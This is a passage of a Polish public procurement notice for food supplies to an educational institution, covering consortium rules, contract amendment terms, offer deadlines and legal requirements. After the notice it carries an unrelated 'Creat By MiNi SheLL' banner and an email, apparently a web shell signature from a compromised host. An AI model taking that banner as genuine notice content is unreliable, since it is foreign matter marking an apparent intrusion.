Pełnomocnictwo musi być złożone w formie elektronicznej (opatrzone podpisem kwalifikowanym, zaufanym lub osobistym) . 6. Uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa – w przypadku zastrzeżenia informacji jako tajemnicy przedsiębiorstwa, Wykonawca zobowiązany jest wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z Rozdziałem XVIII SWZ, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) obowiązują następujące zasady:<br/><br/>1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty. 2. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z ustanowionym pełnomocnikiem. 3. Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik nr 3 do SWZ), składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału . 4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania (składane na wezwanie Zamawiającego) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. 5. W przypadku polegania na zdolnościach jednego z Wykonawców, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (zgodnie z Załącznikiem nr 6 do SWZ), z którego wynika, które dostawy lub usługi wykonają poszczególni Wykonawcy. 6. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ci są zobowiązani przed podpisaniem umowy przedłożyć Zamawiającemu umowę regulującą ich współpracę (np. umowę konsorcjum) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz we Wzorze Umowy (Załącznik nr 2 do SWZ).<br/><br/>Zgodnie z § 9 Wzoru Umowy:<br/><br/>Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie pisemnej, tj. aneksu podpisanego przez obie strony, pod rygorem nieważności.<br/><br/>Zakres przewidywanych zmian i charakter oraz warunki wprowadzenia zmian: 1) wystąpi siła wyższa, która w bezpośredni sposób wpłynie na okoliczności realizacji umowy; 2) nastąpi zmiana numerów katalogowych produktów, przy jednoczesnym zastrzeżeniu braku zmian cen na wyższe oraz jednoczesnym podtrzymaniu co najmniej parametrów przedmiotu zamawianego; 3) wystąpi gwałtowna dekoniunktura lub inne nieprzewidziane okoliczności, niezależne od żadnej ze Stron (gospodarcze, polityczne, społeczne, atmosferyczne itp.), które w bezpośredni sposób wpłyną na okoliczności realizacji umowy; 4) podwyższenie wynagrodzenia Wykonawcy zgodnie z art. 440 ustawy prawo zamówień publicznych w przypadku zmiany ceny produktów spożywczych lub kosztów związanych z realizacją zamówienia o więcej niż 20% w stosunku do ceny produktów spożywczych lub kosztów obowiązujących w dniu otwarcia ofert na następujących zasadach: a) podwyższenie wynagrodzenia, wymaga uprzedniego złożenia przez Wykonawcę oświadczenia o wysokości wzrostu ceny produktów spożywczych lub kosztów związanych z realizacją zamówienia oraz przedstawienia dowodów dla wykazania wzrostu cen; b) Wykonawca zobowiązany jest do przedłożenia szczegółowej kalkulacji kosztów wraz ze wskazaniem ich wpływu na koszty realizacji zamówienia; c) wykonawca może wystąpić z wnioskiem o podwyższenie wynagrodzenia nie wcześniej niż po upływie 6 miesięcy realizacji umowy; d) poziom wzrostu kosztów związanych z realizacją zamówienia oraz zmiana wysokości wynagrodzenia zostaną ustalone w oparciu o negocjacje na podstawie wskaźnika ogłaszanego w komunikacie Prezesa Głównego Urzędu Statystycznego lub przez wskazanie innej podstawy; e) maksymalna wartość zmiany wynagrodzenia nie może przekroczyć 30% wynagrodzenia umownego brutto.<br/><br/>3. Dopuszcza się zmianę umowy w zakresie przedmiotowym, to jest zastąpienie produktu objętego umową odpowiednikiem w przypadku zaprzestania wytwarzania przez producenta asortymentu objętego umową. * Warunki zmiany: Zmiana, o której mowa powyżej, będzie dopuszczalna pod warunkiem, że odpowiednik będzie spełniał wszystkie wymagania Zamawiającego określone w SWZ, nie będzie miał niższych parametrów od zaoferowanego w ofercie oraz będzie znajdował zastosowanie co najmniej w tych samych wskazaniach co asortyment objęty umową i przy cenie nie wyższej niż cena asortymentu objętego umową.<br/><br/>4. Dopuszcza się zmianę umowy polegającą na zmniejszeniu lub zwiększeniu zamówienia w granicach +/- 35% w stosunku do szacunkowych ilości podanych w SWZ, które wynikają ze zmniejszenia lub zwiększenia liczby dzieci w placówce oraz z liczby dni pracy.<br/><br/>5. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym (art. 456 ust. 1 pkt 1 PZP), zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia wiadomości o tych okolicznościach .<br/><br/>6. Nie stanowią zmiany Umowy następujące zmiany: * danych związanych z obsługą administracyjno-organizacyjną Umowy; * danych teleadresowych; * danych rejestrowych; * będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy; * zmiany podmiotu świadczącego usługi w sytuacji przewidzianej prawem (np. sprzedaż przedsiębiorstwa, przekształcenie). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy e-Zamówienia https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-cd14d215-776a-4971-b5e0-706cbe4880f5</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-26 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Język postępowania: Postępowanie prowadzone jest w języku polskim. Oferta oraz wszelkie oświadczenia i dokumenty składane w toku postępowania muszą być sporządzone w języku polskim. <br/><br/>2. Kluczowy wymóg prawny (Rozporządzenie MZ): Wszystkie artykuły żywnościowe objęte dostawą muszą spełniać wymogi sanitarne (w tym HACCP) oraz jednocześnie spełniać warunki zawarte w Rozporządzeniu Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach. <br/><br/>3. Oferty wariantowe: Zamawiający nie dopuszcza możliwości składania ofert wariantowych. <br/><br/>4. Aukcja elektroniczna: Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. <br/><br/>5. Umowa ramowa: Zamawiający nie przewiduje zawarcia umowy ramowej. <br/><br/>Rozwiązania równoważne: Zamawiający dopuszcza możliwość zastosowania towaru równoważnego, pod warunkiem, że zagwarantuje on realizację przedmiotu zamówienia zgodnie z założeniami określonymi w SWZ. Wykazanie równoważności zaoferowanego rozwiązania lub rozwiązań równoważnych spoczywa na Wykonawcy. <br/><br/>Tajemnica przedsiębiorstwa: Wykonawca może zastrzec informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Informacje te należy przekazać w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym wykazaniem (uzasadnieniem), że zastrzegane informacje spełniają przesłanki określone w art. 11 ust. 2 ww. ustawy. <br/><br/>8. Obowiązek podatkowy (VAT): Jeżeli wybór oferty Wykonawcy prowadziłby do powstania u Zamawiającego obowiązku podatkowego (tzw. odwrotne obciążenie), Wykonawca ma obowiązek poinformować o tym Zamawiającego w ofercie oraz wskazać dane wymagane w Rozdziale XXI pkt 8 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com